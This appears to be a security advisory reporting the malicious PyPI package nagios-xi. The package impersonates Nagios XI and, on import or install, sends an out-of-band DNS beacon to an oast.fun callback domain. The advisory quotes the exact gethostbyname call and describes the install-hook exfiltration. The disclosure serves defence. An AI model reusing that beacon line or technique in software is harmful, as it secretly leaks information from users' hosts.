Malicious code in nagios-xi (PyPI)

---

__

Source: amazon-inspector (c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f)

On import nagios_xi, the package's __init__.py (lines 5-8) invokes socket.gethostbyname("atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun") inside a silent try/except. oast.fun is ProjectDiscovery's Interactsh out-of-band callback service; the DNS query itself is the exfiltration channel, confirming code execution on the installer's host and leaking the resolver IP to whoever controls the unique 32-character Interactsh subdomain. The package ships no actual functionality — it impersonates the Nagios XI commercial monitoring product (name nagios-xi, version 19.5.0 mimicking real Nagios XI versioning) while declaring an anonymous ProtonMail author (Coding Team <pocbug@protonmail.com>), a generic package utility description, and an empty README. The combination of brand impersonation, placeholder metadata, and an import-time OAST beacon as the package's sole behavior is reconnaissance for a supply-chain attack against developers searching for Nagios XI integrations.

Source: kam193 (d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.

---

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

• The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

• The package overrides the install command in setup.py to execute malicious code during installation.